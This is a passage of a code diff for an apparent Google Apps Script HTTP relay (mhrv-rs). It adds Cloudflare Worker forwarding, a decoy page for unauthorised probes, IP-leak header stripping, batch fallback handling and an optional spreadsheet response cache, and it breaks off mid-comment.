+    var authUnset = AUTH_KEY === DEFAULT_AUTH_KEY;
+    if (authUnset) return _json({ e: "configure AUTH_KEY in Code.cfw.gs" });
+    var workerUnset = WORKER_URL === DEFAULT_WORKER_URL;
+    if (workerUnset) return _json({ e: "configure WORKER_URL in Code.cfw.gs" });
+
+    var request = JSON.parse(e.postData.contents);
+    var authorized = request.k === AUTH_KEY;
+    if (!authorized) return _decoyOrError({ e: "unauthorized" });
+
+    // A `q` array selects batch mode; anything else is a single request.
+    return Array.isArray(request.q) ? _doBatch(request.q) : _doSingle(request);
+  } catch (err) {
+    // Unparseable bodies and other throws get the same decoy treatment.
+    return _decoyOrError({ e: String(err) });
+  }
+}
+
+function doGet(e) {
+  // GET requests always receive the decoy placeholder page.
+  var page = ContentService.createTextOutput(DECOY_HTML);
+  return page.setMimeType(ContentService.MimeType.HTML);
+}
+
+// ── Worker Forwarding ──────────────────────────────────────
+
+/**
+ * Strip headers that must not be forwarded (hop-by-hop / Apps-Script-
+ * managed). Returns a fresh header map; the input is never mutated.
+ */
+function _scrubHeaders(rawHeaders) {
+  var out = {};
+  if (!rawHeaders || typeof rawHeaders !== "object") return out;
+  // Borrow hasOwnProperty from Object.prototype: the map comes from
+  // client JSON and may itself contain a "hasOwnProperty" key.
+  var owns = Object.prototype.hasOwnProperty;
+  for (var k in rawHeaders) {
+    if (owns.call(rawHeaders, k) && !SKIP_HEADERS[k.toLowerCase()]) out[k] = rawHeaders[k];
+  }
+  return out;
+}
+
+/**
+ * Normalize one request item into the shape the Worker expects.
+ * Single mode sends the result as `{k, ...item}`; batch mode as
+ * `{k, q: [item, ...]}`. Callers add the auth key at envelope level.
+ */
+function _normalizeItem(item) {
+  return {
+    u: item.u,
+    // String() so a non-string `m` cannot throw on toUpperCase().
+    m: String(item.m || "GET").toUpperCase(),
+    h: _scrubHeaders(item.h),
+    b: item.b || null,
+    ct: item.ct || null,
+    r: item.r !== false,
+  };
+}
+
+function _workerFetchOptions(payload) {
+  // Request descriptor usable by both UrlFetchApp.fetch and fetchAll;
+  // `payload` is serialised to JSON once, here.
+  var options = { url: WORKER_URL, method: "post" };
+  options.contentType = "application/json";
+  options.payload = JSON.stringify(payload);
+  options.muteHttpExceptions = true;
+  options.followRedirects = true;
+  options.validateHttpsCertificates = true;
+  return options;
+}
+
+// ── Single Request ─────────────────────────────────────────
+
+/**
+ * Relay one request through the Worker and return its JSON reply.
+ */
+function _doSingle(req) {
+  var target = req.u;
+  var isHttpUrl = !!target && typeof target === "string" && /^https?:\/\//i.test(target);
+  if (!isHttpUrl) return _json({ e: "bad url" });
+
+  // Envelope: auth key first, then the normalized request fields
+  // u, m, h, b, ct, r in that order.
+  var item = _normalizeItem(req);
+  var envelope = { k: AUTH_KEY };
+  ["u", "m", "h", "b", "ct", "r"].forEach(function(field) {
+    envelope[field] = item[field];
+  });
+
+  // muteHttpExceptions only turns HTTP-level errors (4xx/5xx) into a
+  // normal HTTPResponse. Network-level failures — DNS resolution,
+  // TLS handshake, connection timeout to *.workers.dev — still throw.
+  // Report those as `{e}` here: left to the doPost outer catch they
+  // would come back as the decoy HTML page, which makes the
+  // deployment look like a bad-auth probe to the client and gives
+  // the operator nothing to debug with. Auth has already passed at
+  // this point, so the probe-defence argument doesn't apply.
+  var opts = _workerFetchOptions(envelope);
+  var resp;
+  try {
+    resp = UrlFetchApp.fetch(opts.url, opts);
+  } catch (err) {
+    return _json({ e: "worker unreachable: " + String(err) });
+  }
+  return _json(_parseWorkerJson(resp));
+}
+
+// ── Batch Request ──────────────────────────────────────────
+
+/**
+ * Forward a batch to the Worker, chunking when needed. Each chunk
+ * becomes ONE POST to the Worker; the Worker fans out across the URLs
+ * in the chunk via Promise.all and returns `{q: [...]}` in the same
+ * order. Multiple chunks fire in parallel via UrlFetchApp.fetchAll.
+ *
+ * Quota cost: ceil(N / WORKER_BATCH_CHUNK) GAS UrlFetchApp calls for
+ * an N-URL batch. For typical mhrv-rs batches of 5-30 URLs this is
+ * exactly 1 call (vs N under standard Code.gs's fetchAll). Larger
+ * batches gracefully degrade to a few calls instead of failing under
+ * the Worker's own MAX_BATCH_SIZE soft cap.
+ *
+ * Malformed items (non-objects, bad URLs) are rejected locally so the
+ * Worker only sees valid inputs, then re-interleaved into the result
+ * array in original order so mhrv-rs's batch-index assumptions hold.
+ */
+function _doBatch(items) {
+  var validItems = [];
+  var errorMap = {};
+
+  for (var i = 0; i < items.length; i++) {
+    var item = items[i];
+    // A null / primitive entry would throw on `item.u` and turn the
+    // whole batch into the decoy page; reject only that slot.
+    if (!item || typeof item !== "object") {
+      errorMap[i] = "bad item";
+      continue;
+    }
+    if (!item.u || typeof item.u !== "string" || !item.u.match(/^https?:\/\//i)) {
+      errorMap[i] = "bad url";
+      continue;
+    }
+    validItems.push(_normalizeItem(item));
+  }
+
+  var workerResults = [];
+  if (validItems.length > 0) {
+    // Split into chunks ≤ WORKER_BATCH_CHUNK so each Worker call stays
+    // under the Worker's MAX_BATCH_SIZE cap.
+    var chunks = [];
+    for (var c = 0; c < validItems.length; c += WORKER_BATCH_CHUNK) {
+      chunks.push(validItems.slice(c, c + WORKER_BATCH_CHUNK));
+    }
+    var fetchOpts = chunks.map(function(chunk) {
+      return _workerFetchOptions({ k: AUTH_KEY, q: chunk });
+    });
+
+    // muteHttpExceptions covers HTTP-level errors. Network-level
+    // failures (DNS, TLS, connection timeout to *.workers.dev) still
+    // throw — catch them and mark every slot unreachable so mhrv-rs's
+    // per-item retry handles them, instead of the client getting the
+    // decoy HTML page from the doPost outer catch (auth has already
+    // passed here, so the probe-defence argument doesn't apply).
+    var responses = null;
+    try {
+      // Single-chunk fast path skips fetchAll for the common case.
+      if (fetchOpts.length === 1) {
+        responses = [UrlFetchApp.fetch(fetchOpts[0].url, fetchOpts[0])];
+      } else {
+        responses = UrlFetchApp.fetchAll(fetchOpts);
+      }
+    } catch (err) {
+      var unreachable = { e: "worker unreachable: " + String(err) };
+      for (var u = 0; u < validItems.length; u++) workerResults.push(unreachable);
+    }
+
+    for (var r = 0; responses && r < responses.length; r++) {
+      var parsed = _parseWorkerJson(responses[r]);
+      var replies = (parsed && Array.isArray(parsed.q)) ? parsed.q : null;
+      // Per-chunk failure (worker error, parse failure, auth, etc):
+      // every slot of this chunk gets the same error so mhrv-rs
+      // retries each item individually. Other chunks are unaffected.
+      var slotErr = (parsed && parsed.e)
+        ? { e: parsed.e }
+        : { e: "worker batch failure" };
+      // Emit exactly one entry per item in the chunk: a reply array
+      // shorter or longer than the chunk must not shift later chunks.
+      for (var s = 0; s < chunks[r].length; s++) {
+        if (!replies) workerResults.push(slotErr);
+        else workerResults.push(replies[s] || { e: "missing worker response" });
+      }
+    }
+  }
+
+  // Reassemble into the original order: validated slots get their
+  // worker result; invalid slots get their pre-flight error.
+  var results = [];
+  var wi = 0;
+  for (var j = 0; j < items.length; j++) {
+    if (errorMap.hasOwnProperty(j)) {
+      results.push({ e: errorMap[j] });
+    } else {
+      results.push(workerResults[wi++] || { e: "missing worker response" });
+    }
+  }
+  return _json({ q: results });
+}
+
+// ── Worker response handling ───────────────────────────────
+
+/**
+ * Parse the Worker's JSON envelope. Worker `{e: "..."}` errors pass
+ * through unchanged so mhrv-rs sees the same error-shape as for a
+ * direct-fetch failure in Code.gs. A body that is not a JSON object
+ * (HTML error page, bare `null`, ...) is wrapped into `{e}`.
+ */
+function _parseWorkerJson(resp) {
+  var code = resp.getResponseCode();
+  var text = resp.getContentText();
+  try {
+    var parsed = JSON.parse(text);
+    if (parsed && typeof parsed === "object" && !Array.isArray(parsed)) return parsed;
+  } catch (err) {
+    // Not JSON at all — fall through to the wrapped error below.
+  }
+  return { e: "worker " + code + ": " + (text.length > 200 ? text.substring(0, 200) + "…" : text) };
+}
+
+function _json(obj) {
+  // Serialise `obj` and serve it with the JSON MIME type.
+  var output = ContentService.createTextOutput(JSON.stringify(obj));
+  return output.setMimeType(ContentService.MimeType.JSON);
+}
diff --git a/assets/apps_script/Code.gs b/assets/apps_script/Code.gs
index 8c2acecd..13922255 100644
--- a/assets/apps_script/Code.gs
+++ b/assets/apps_script/Code.gs
@@ -6,30 +6,130 @@
  *   2. Batch:   POST { k, q: [{m,u,h,b,ct,r}, ...] } → { q: [{s,h,b}, ...] }
  *      Uses UrlFetchApp.fetchAll() — all URLs fetched IN PARALLEL.
  *
+ * OPTIONAL SPREADSHEET-BACKED RESPONSE CACHE:
+ *   Set CACHE_SPREADSHEET_ID to a valid Google Sheet ID (must be owned by
+ *   the same account). When enabled, public GET requests are stored in the
+ *   sheet and served from there on repeat visits, reducing UrlFetchApp
+ *   quota consumption. Bodies are gzipped before base64 storage so larger
+ *   responses fit under the per-cell character limit, and persistent
+ *   4xx (404/410/451) get a short negative-cache TTL so buggy clients
+ *   that hammer dead URLs cost zero quota; 5xx is never cached so a
+ *   flapping upstream cannot poison a 24h slot with a transient outage.
+ *   The cache is Vary-aware (Accept-Encoding and Accept-Language are
+ *   hashed into the compound cache key). Leave CACHE_SPREADSHEET_ID as-is
+ *   to disable caching entirely — zero overhead.
+ *
  * DEPLOYMENT:
  *   1. Go to https://script.google.com → New project
  *   2. Delete the default code, paste THIS entire file
- *   3. Click Deploy → New deployment
- *   4. Type: Web app  |  Execute as: Me  |  Who has access: Anyone
- *   5. Copy the Deployment ID into config.json as "script_id"
+ *   3. Change AUTH_KEY below to your own secret
+ *   4. (Optional) Set CACHE_SPREADSHEET_ID to enable caching
+ *   5. Click Deploy → New deployment
+ *   6. Type: Web app  |  Execute as: Me  |  Who has access: Anyone
+ *   7. Copy the Deployment ID into config.json as "script_id"
  *
  * CHANGE THE AUTH KEY BELOW TO YOUR OWN SECRET!
  */
 
 const AUTH_KEY = "CHANGE_ME_TO_A_STRONG_SECRET";
 
-// Keep browser capability headers (sec-ch-ua*, sec-fetch-*) intact.
-// Some modern apps, notably Google Meet, use them for browser gating.
+// Active-probing defense. When false (production default), bad AUTH_KEY
+// requests get a decoy HTML page that looks like a placeholder Apps
+// Script web app instead of the JSON `{"e":"unauthorized"}` body. This
+// makes the deployment indistinguishable from a forgotten-but-public
+// Apps Script project to active scanners that POST malformed payloads
+// looking for proxy endpoints.
+//
+// Set to `true` during initial setup if a misconfigured client is
+// hitting "unauthorized" and you want the explicit JSON error to debug
+// — then flip back to false before the deployment is widely shared.
+// (Inspired by #365 Section 3, mhrv-rs v1.8.0+.)
+const DIAGNOSTIC_MODE = false;
+
+// ── Optional Spreadsheet Cache ──────────────────────────────
+// Set to a valid Spreadsheet ID to enable response caching.
+// Leave as-is to disable caching entirely (zero overhead).
+const CACHE_SPREADSHEET_ID = "CHANGE_ME_TO_CACHE_SPREADSHEET_ID";
+const CACHE_SHEET_NAME = "RelayCache";
+const CACHE_META_SHEET_NAME = "RelayMeta";
+const CACHE_META_CURSOR_CELL = "A1";
+
+// ── Cache Tuning ────────────────────────────────────────────
+const CACHE_MAX_ROWS = 5000;             // circular buffer capacity
+const CACHE_MAX_BODY_BYTES = 35000;      // skip responses larger than ~35 KB
+const CACHE_DEFAULT_TTL_SECONDS = 86400; // 24-hour fallback when no Cache-Control
+
+// ── Negative Caching ────────────────────────────────────────
+// Persistent 4xx errors get a short TTL when the upstream is silent on
+// Cache-Control. Buggy clients hammer dead URLs (favicons, telemetry
+// pixels, dev-tools probes); a 5-minute floor absorbs the storm at
+// zero quota cost while letting transient 404s self-heal quickly.
+// 5xx is never cached — see _fetchAndCache.
+const NEGATIVE_CACHE_STATUSES = { 404: 1, 410: 1, 451: 1 };
+const NEGATIVE_CACHE_TTL_SECONDS = 300;
+
+// ── Body Compression ────────────────────────────────────────
+// Bodies are gzipped before base64 storage when worthwhile. Gzip has
+// ~20 bytes of header overhead, so very small payloads can bloat;
+// skip below this threshold. Already-encoded responses (gzip/br/etc.)
+// are stored as-is to avoid double-compression.
+const GZIP_MIN_BYTES = 256;
+
+// ── Vary-Aware Cache Key ────────────────────────────────────
+// These request headers are hashed into the compound cache key
+// alongside the URL so that responses with different encodings
+// or languages never collide in the cache. Covers ~95 % of
+// real-world Vary usage without inspecting the response.
+const VARY_KEY_HEADERS = ["accept-encoding", "accept-language"];
+
+// Connection-level + IP-leak request headers we strip before forwarding
+// to the destination. Browser capability headers (sec-ch-ua*, sec-fetch-*)
+// stay intact — modern apps like Google Meet use them for browser gating.
+// We also drop the `X-Forwarded-*` / `Forwarded` / `Via` family so a
+// misconfigured upstream proxy on the user side can't leak the user's
+// real IP through the relay path. Mirrors upstream
+// `masterking32/MasterHttpRelayVPN@3094288`.
 const SKIP_HEADERS = {
   host: 1, connection: 1, "content-length": 1,
   "transfer-encoding": 1, "proxy-connection": 1, "proxy-authorization": 1,
   "priority": 1, te: 1,
+  "x-forwarded-for": 1, "x-forwarded-host": 1, "x-forwarded-proto": 1,
+  "x-forwarded-port": 1, "x-real-ip": 1, "forwarded": 1, "via": 1,
+};
+
+// Methods we consider safe to replay if `UrlFetchApp.fetchAll()` raises.
+// GET/HEAD/OPTIONS are idempotent per RFC 9110; POST/PUT/PATCH/DELETE
+// can have side-effects so we surface the error instead of silently
+// re-firing them.
+const SAFE_REPLAY_METHODS = { GET: 1, HEAD: 1, OPTIONS: 1 };
+
+// Headers that disqualify a request from the cache path.
+const CACHE_BUSTING_HEADERS = {
+  authorization: 1, cookie: 1, "x-api-key": 1,
+  "proxy-authorization": 1, "set-cookie": 1,
 };
 
+// HTML body for the bad-auth decoy. Mimics a minimal Apps Script-style
+// placeholder page — no proxy-shaped JSON, nothing distinctive enough
+// for a probe to fingerprint as a tunnel endpoint.
+const DECOY_HTML =
+  '<!DOCTYPE html><html><head><title>Web App</title></head>' +
+  '<body><p>The script completed but did not return anything.</p>' +
+  '</body></html>';
+
+// ── Request Handlers ────────────────────────────────────────
+
+function _decoyOrError(jsonBody) {
+  // Diagnostic mode surfaces the JSON error; otherwise serve the decoy page.
+  if (DIAGNOSTIC_MODE) return _json(jsonBody);
+  var decoy = ContentService.createTextOutput(DECOY_HTML);
+  return decoy.setMimeType(ContentService.MimeType.HTML);
+}
+
 function doPost(e) {
   try {
     var req = JSON.parse(e.postData.contents);
-    if (req.k !== AUTH_KEY) return _json({ e: "unauthorized" });
+    if (req.k !== AUTH_KEY) return _decoyOrError({ e: "unauthorized" });
 
     // Batch mode: { k, q: [...] }
     if (Array.isArray(req.q)) return _doBatch(req.q);
@@ -37,61 +137,172 @@ function doPost(e) {
     // Single mode
     return _doSingle(req);
   } catch (err) {
-    return _json({ e: String(err) });
+    // Parse failures of the request body are also probe-shaped — a real
+    // mhrv-rs client never sends invalid JSON. Decoy for the same reason.
+    return _decoyOrError({ e: String(err) });
   }
 }
 
+// `doGet` is what active scanners hit first (HTTP GET probes are cheaper
+// than POSTs). Apps Script defaults to a "Script function not found" page
+// here which is a fine-enough decoy on its own, but explicitly returning
+// the same harmless placeholder makes the response identical to the
+// bad-auth POST decoy — one less fingerprint vector.
+function doGet(e) {
+  // GET requests always receive the decoy placeholder page.
+  var page = ContentService.createTextOutput(DECOY_HTML);
+  return page.setMimeType(ContentService.MimeType.HTML);
+}
+
+// ── Single Request ─────────────────────────────────────────
+
 function _doSingle(req) {
   if (!req.u || typeof req.u !== "string" || !req.u.match(/^https?:\/\//i)) {
     return _json({ e: "bad url" });
   }
-  var opts = _buildOpts(req);
-  var resp = UrlFetchApp.fetch(req.u, opts);
-  return _json({
-    s: resp.getResponseCode(),
-    h: _respHeaders(resp),
-    b: Utilities.base64Encode(resp.getContent()),
-  });
+
+  // ── Optional cache path ────────────────────────────────
+  // Only entered when CACHE_SPREADSHEET_ID is configured and
+  // the request qualifies as a public, cachable GET. The cache is
+  // best-effort: a throw in here (e.g. JSON.parse on a damaged
+  // Headers cell) falls through to the normal relay instead of
+  // reaching doPost's catch, which would answer with the decoy page.
+  if (_canUseCache(req)) {
+    try {
+      var cached = _getFromCache(req.u, req.h);
+      if (cached) {
+        return _json({
+          s: cached.status,
+          h: JSON.parse(cached.headers),
+          b: cached.body,
+          cached: true,
+        });
+      }
+
+      var fetchResult = _fetchAndCache(req.u, req.h);
+      if (fetchResult) {
+        return _json({
+          s: fetchResult.status,
+          h: JSON.parse(fetchResult.headers),
+          b: fetchResult.body,
+          cached: false,
+        });
+      }
+      // null fetchResult (spreadsheet unavailable): relay normally below.
+    } catch (cacheErr) {
+      // Fall through: relay this request without the cache.
+    }
+  }
+
+  // ── Normal relay (cache disabled or unavailable) ────────
+  // Wrap the fetch + body encode in try/catch so failures (URL too
+  // long, payload too large, quota exhausted, execution timeout,
+  // base64Encode on a huge body) come back as a JSON error envelope
+  // the Rust client can parse, rather than an HTML page with no cause.
+  try {
+    var opts = _buildOpts(req);
+    var resp = UrlFetchApp.fetch(req.u, opts);
+    return _json({
+      s: resp.getResponseCode(),
+      h: _respHeaders(resp),
+      b: Utilities.base64Encode(resp.getContent()),
+    });
+  } catch (err) {
+    return _json({ e: "fetch failed: " + String(err) });
+  }
 }
 
+// ── Batch Request ──────────────────────────────────────────
+
 function _doBatch(items) {
   var fetchArgs = [];
+  // fetchIndex[j] / fetchMethods[j] describe fetchArgs[j]: the item's
+  // position in `items` and its upper-cased HTTP method.
+  var fetchIndex = [];
+  var fetchMethods = [];
   var errorMap = {};
 
   for (var i = 0; i < items.length; i++) {
     var item = items[i];
+    if (!item || typeof item !== "object") {
+      errorMap[i] = "bad item";
+      continue;
+    }
     if (!item.u || typeof item.u !== "string" || !item.u.match(/^https?:\/\//i)) {
       errorMap[i] = "bad url";
       continue;
     }
-    var opts = _buildOpts(item);
-    opts.url = item.u;
-    fetchArgs.push({ _i: i, _o: opts });
+    try {
+      var opts = _buildOpts(item);
+      opts.url = item.u;
+      fetchArgs.push(opts);
+      fetchIndex.push(i);
+      fetchMethods.push(String(item.m || "GET").toUpperCase());
+    } catch (buildErr) {
+      errorMap[i] = String(buildErr);
+    }
   }
 
-  // fetchAll() processes all requests in parallel inside Google
+  // fetchAll() processes all requests in parallel inside Google. If it
+  // throws as a whole (e.g. one URL violates UrlFetchApp limits and
+  // poisons the whole batch), degrade to per-item fetch on safe methods
+  // so a single bad request does not zero out every response in the
+  // batch. Mirrors upstream `masterking32/MasterHttpRelayVPN@3094288`.
   var responses = [];
   if (fetchArgs.length > 0) {
-    responses = UrlFetchApp.fetchAll(fetchArgs.map(function(x) { return x._o; }));
+    try {
+      responses = UrlFetchApp.fetchAll(fetchArgs);
+    } catch (fetchAllErr) {
+      responses = [];
+      for (var j = 0; j < fetchArgs.length; j++) {
+        try {
+          if (!SAFE_REPLAY_METHODS[fetchMethods[j]]) {
+            errorMap[fetchIndex[j]] =
+              "batch fetchAll failed; unsafe method not replayed";
+            responses[j] = null;
+            continue;
+          }
+          var fallbackReq = fetchArgs[j];
+          var fallbackUrl = fallbackReq.url;
+          var fallbackOpts = {};
+          for (var key in fallbackReq) {
+            var own = Object.prototype.hasOwnProperty.call(fallbackReq, key);
+            if (own && key !== "url") fallbackOpts[key] = fallbackReq[key];
+          }
+          responses[j] = UrlFetchApp.fetch(fallbackUrl, fallbackOpts);
+        } catch (singleErr) {
+          errorMap[fetchIndex[j]] = String(singleErr);
+          responses[j] = null;
+        }
+      }
+    }
   }
 
   var results = [];
   var rIdx = 0;
   for (var i = 0; i < items.length; i++) {
-    if (errorMap.hasOwnProperty(i)) {
+    // Consume this item's response slot even when the fallback path
+    // recorded an error for it, so later items stay aligned.
+    var resp = fetchIndex[rIdx] === i ? responses[rIdx++] : null;
+    if (Object.prototype.hasOwnProperty.call(errorMap, i)) {
       results.push({ e: errorMap[i] });
     } else {
-      var resp = responses[rIdx++];
-      results.push({
-        s: resp.getResponseCode(),
-        h: _respHeaders(resp),
-        b: Utilities.base64Encode(resp.getContent()),
-      });
+      if (!resp) {
+        results.push({ e: "fetch failed" });
+      } else {
+        results.push({
+          s: resp.getResponseCode(),
+          h: _respHeaders(resp),
+          b: Utilities.base64Encode(resp.getContent()),
+        });
+      }
     }
   }
   return _json({ q: results });
 }
 
+// ── Request Building ───────────────────────────────────────
+
 function _buildOpts(req) {
   var opts = {
     method: (req.m || "GET").toLowerCase(),
@@ -125,17 +336,462 @@ function _respHeaders(resp) {
   return resp.getHeaders();
 }
 
-function doGet(e) {
-  return HtmlService.createHtmlOutput(
-    "<!DOCTYPE html><html><head><title>My App</title></head>" +
-      '<body style="font-family:sans-serif;max-width:600px;margin:40px auto">' +
-      "<h1>Welcome</h1><p>This application is running normally.</p>" +
-      "</body></html>"
-  );
-}
-
 function _json(obj) {
   return ContentService.createTextOutput(JSON.stringify(obj)).setMimeType(
     ContentService.MimeType.JSON
   );
 }
+
+// ═══════════════════════════════════════════════════════════
+//  SPREADSHEET CACHE — SHEET MANAGEMENT
+// ═══════════════════════════════════════════════════════════
+
+// Open the sheet that stores cache rows, creating it (with its header
+// row) on first use. Returns null when the cache ID is still the
+// placeholder or when any spreadsheet call throws.
+function _initCacheSheet() {
+  var unconfigured = CACHE_SPREADSHEET_ID === "CHANGE_ME_TO_CACHE_SPREADSHEET_ID";
+  if (unconfigured) return null;
+
+  try {
+    var book = SpreadsheetApp.openById(CACHE_SPREADSHEET_ID);
+    var existing = book.getSheetByName(CACHE_SHEET_NAME);
+    if (existing) return existing;
+
+    // Schema: URL_Hash | URL | Status | Headers | Body | Timestamp | Expires_At | Z
+    // Z is 1 when Body is base64(gzip(rawBytes)), 0/empty when base64(rawBytes).
+    // Rows written by older 7-column deployments have no Z value and are
+    // therefore read back as "not gzipped".
+    var columns = ["URL_Hash", "URL", "Status", "Headers", "Body", "Timestamp", "Expires_At", "Z"];
+    var created = book.insertSheet(CACHE_SHEET_NAME);
+    created.getRange(1, 1, 1, 8).setValues([columns]);
+    return created;
+  } catch (e) { return null; }
+}
+
+// Open (creating on first use) the hidden sheet holding the ring-buffer
+// write cursor; a new sheet starts the cursor at row 2. Returns null
+// when the cache ID is the placeholder or a spreadsheet call throws.
+function _getMetaSheet() {
+  if (CACHE_SPREADSHEET_ID !== "CHANGE_ME_TO_CACHE_SPREADSHEET_ID") {
+    try {
+      var book = SpreadsheetApp.openById(CACHE_SPREADSHEET_ID);
+      var meta = book.getSheetByName(CACHE_META_SHEET_NAME);
+      if (meta) return meta;
+      meta = book.insertSheet(CACHE_META_SHEET_NAME);
+      meta.getRange(CACHE_META_CURSOR_CELL).setValue(2);
+      meta.hideSheet();
+      return meta;
+    } catch (e) { /* fall through: reported as unavailable */ }
+  }
+  return null;
+}
+
+// Pick the row for the next cache write. While the sheet still holds
+// fewer than CACHE_MAX_ROWS data rows the entry is appended below the
+// last used row; once full, the persisted ring cursor is reused. The
+// cursor cell is only read in that case, and any value outside
+// 2..CACHE_MAX_ROWS + 1 (hand-edited cell, lowered limit) restarts at 2.
+function _getNextCursor(sheet, metaSheet) {
+  var usedRows = sheet.getDataRange().getNumRows();
+  if (usedRows < CACHE_MAX_ROWS + 1) return usedRows + 1;
+
+  var cursor = metaSheet.getRange(CACHE_META_CURSOR_CELL).getValue();
+  var valid = typeof cursor === "number" && cursor >= 2 && cursor <= CACHE_MAX_ROWS + 1;
+  return valid ? Math.floor(cursor) : 2;
+}
+
+// Persist the slot after `currentRow`, wrapping past the last slot to row 2.
+function _advanceCursor(metaSheet, currentRow) {
+  var wrapped = currentRow + 1 > CACHE_MAX_ROWS + 1 ? 2 : currentRow + 1;
+  metaSheet.getRange(CACHE_META_CURSOR_CELL).setValue(wrapped);
+}
+
+// Grow the grid to CACHE_MAX_ROWS + 1 physical rows (header + slots).
+// Measured with getMaxRows(): blank rows never extend getDataRange(),
+// so sizing from the data range re-inserted rows on every single write.
+function _ensureRowsAllocated(sheet) {
+  var gridRows = sheet.getMaxRows();
+  if (gridRows < CACHE_MAX_ROWS + 1) sheet.insertRowsAfter(gridRows, CACHE_MAX_ROWS + 1 - gridRows);
+}
+
+// ═══════════════════════════════════════════════════════════
+//  SPREADSHEET CACHE — VARY-AWARE COMPOUND KEY
+// ═══════════════════════════════════════════════════════════
+
+/**
+ * Case-insensitive header lookup (RFC 7230 § 3.2); null when absent.
+ * hasOwnProperty is borrowed from Object.prototype so a client header
+ * literally named "hasOwnProperty" cannot shadow it and throw.
+ */
+function _getHeaderCaseInsensitive(headers, targetKey) {
+  var target = targetKey.toLowerCase();
+  for (var k in headers) {
+    var own = Object.prototype.hasOwnProperty.call(headers, k);
+    if (own && k.toLowerCase() === target) return headers[k];
+  }
+  return null;
+}
+
+/**
+ * Compute a compound cache key:
+ *   MD5(URL | header1:value1 | header2:value2 | ...)
+ *
+ * Instead of reading the response Vary header (which would require
+ * fetching first — circular), the request headers listed in
+ * VARY_KEY_HEADERS are folded into the key up front.
+ *
+ * Values are coerced to strings, lowercased and whitespace-stripped so
+ * semantically identical requests from different clients produce the
+ * same hash. Missing, empty and whitespace-only headers all map to
+ * "<none>". The coercion matters if the header map comes from parsed
+ * client JSON (presumably — confirm against the caller): a numeric or
+ * array value has no toLowerCase() and would otherwise throw.
+ *
+ * @param {string} url Request URL.
+ * @param {?Object} reqHeaders Request header map; may be absent.
+ * @return {string} Hex MD5 of the compound key.
+ */
+function _getCacheKey(url, reqHeaders) {
+  var haveHeaders = !!reqHeaders && typeof reqHeaders === "object";
+  var parts = [url];
+
+  for (var i = 0; i < VARY_KEY_HEADERS.length; i++) {
+    var headerName = VARY_KEY_HEADERS[i];
+    var rawValue = haveHeaders
+      ? _getHeaderCaseInsensitive(reqHeaders, headerName)
+      : null;
+    var normalized = rawValue
+      ? String(rawValue).toLowerCase().replace(/\s/g, "")
+      : "";
+    parts.push(headerName + ":" + (normalized || "<none>"));
+  }
+
+  var compoundKey = parts.join("|");
+  return _md5Hex(compoundKey);
+}
+
+// Lowercase hex MD5 of `input`; negative digest bytes are mapped to 0..255.
+function _md5Hex(input) {
+  var digest = Utilities.computeDigest(Utilities.DigestAlgorithm.MD5, input);
+  var hex = "";
+  for (var i = 0; i < digest.length; i++) {
+    hex += ("0" + (digest[i] & 0xff).toString(16)).slice(-2);
+  }
+  return hex;
+}
+
+// ═══════════════════════════════════════════════════════════
+//  SPREADSHEET CACHE — CORE LOGIC
+// ═══════════════════════════════════════════════════════════
+
+/**
+ * Returns true if the request is eligible for the cache path: GET (any
+ * letter case), no body, an http(s) URL, no header listed in
+ * CACHE_BUSTING_HEADERS, and a configured cache spreadsheet. `req` is
+ * probed defensively so a header literally named "hasOwnProperty" or a
+ * non-string URL yields false / is skipped instead of throwing.
+ */
+function _canUseCache(req) {
+  if (String(req.m || "GET").toUpperCase() !== "GET") return false;
+  if (req.b) return false;
+  if (typeof req.u !== "string" || !/^https?:\/\//i.test(req.u)) return false;
+  if (CACHE_SPREADSHEET_ID === "CHANGE_ME_TO_CACHE_SPREADSHEET_ID") return false;
+  if (req.h && typeof req.h === "object") {
+    for (var k in req.h) {
+      var own = Object.prototype.hasOwnProperty.call(req.h, k);
+      if (own && CACHE_BUSTING_HEADERS[k.toLowerCase()]) return false;
+    }
+  }
+  return true;
+}
+
+/**
+ * Extract the cache lifetime (seconds) from a Cache-Control header value.
+ *
+ * Returns 0 when the response must not be stored or reused: no-cache,
+ * no-store, private, or an explicit max-age=0 (the origin declares the
+ * body stale on arrival, so flooring it to 60 s would serve content the
+ * origin asked not to reuse). Falls back to CACHE_DEFAULT_TTL_SECONDS
+ * when the header is absent or carries no max-age. Any other max-age is
+ * clamped to [60, 2592000] (1 min – 30 days).
+ *
+ * @param {?string} cacheControlHeader Raw header value, if any.
+ * @return {number} TTL in seconds; 0 means "do not cache".
+ */
+function _parseMaxAge(cacheControlHeader) {
+  if (!cacheControlHeader) return CACHE_DEFAULT_TTL_SECONDS;
+  // String() keeps a non-string value (e.g. a multi-value array) from throwing.
+  var lower = String(cacheControlHeader).toLowerCase();
+  var forbidden = ["no-cache", "no-store", "private"];
+  for (var i = 0; i < forbidden.length; i++) {
+    if (lower.indexOf(forbidden[i]) !== -1) return 0;
+  }
+
+  var match = lower.match(/max-age=(\d+)/);
+  if (!match) return CACHE_DEFAULT_TTL_SECONDS;
+  var ttl = parseInt(match[1], 10);
+  return ttl === 0 ? 0 : Math.max(60, Math.min(ttl, 2592000));
+}
+
+/**
+ * Rewrite time-sensitive headers so the client sees Date, Age and
+ * Cache-Control values reflecting cache age. Stored variants of those
+ * three are removed case-insensitively first, so a lowercase upstream
+ * `cache-control` cannot ride along and contradict the rewritten one.
+ */
+function _refreshCachedHeaders(headersJson, timestamp) {
+  var headers = JSON.parse(headersJson);
+  var now = new Date();
+  var cachedAt = new Date(timestamp);
+  if (isNaN(cachedAt.getTime())) cachedAt = now;   // unreadable cell: age 0
+  var ageSeconds = Math.floor((now.getTime() - cachedAt.getTime()) / 1000);
+  if (ageSeconds < 0) ageSeconds = 0;
+  var originalCc = headers["Cache-Control"] || headers["cache-control"];
+  Object.keys(headers).forEach(function (name) {
+    var lower = name.toLowerCase();
+    if (lower !== "cache-control" && lower !== "date" && lower !== "age") return;
+    if (!originalCc && lower === "cache-control") originalCc = headers[name];
+    delete headers[name];
+  });
+  if (originalCc) headers["X-Original-Cache-Control"] = originalCc;
+  headers["Date"] = now.toUTCString();
+  headers["Age"] = String(ageSeconds);
+  headers["Cache-Control"] = "public, max-age=" + Math.max(0, _parseMaxAge(originalCc) - ageSeconds);
+  headers["X-Cache"] = "HIT from relay-spreadsheet";
+  headers["X-Cached-At"] = cachedAt.toUTCString();
+  return JSON.stringify(headers);
+}
+
+/**
+ * Retrieve a cached response by compound cache key.
+ *
+ * A re-fetched key is written to a new ring-buffer slot without
+ * removing its stale row, so one key can occupy several rows. Every
+ * whole-cell match in the hash column is inspected and the first
+ * unexpired one is served; stopping at the first match would let an
+ * old expired row shadow a fresh one until that row was overwritten.
+ *
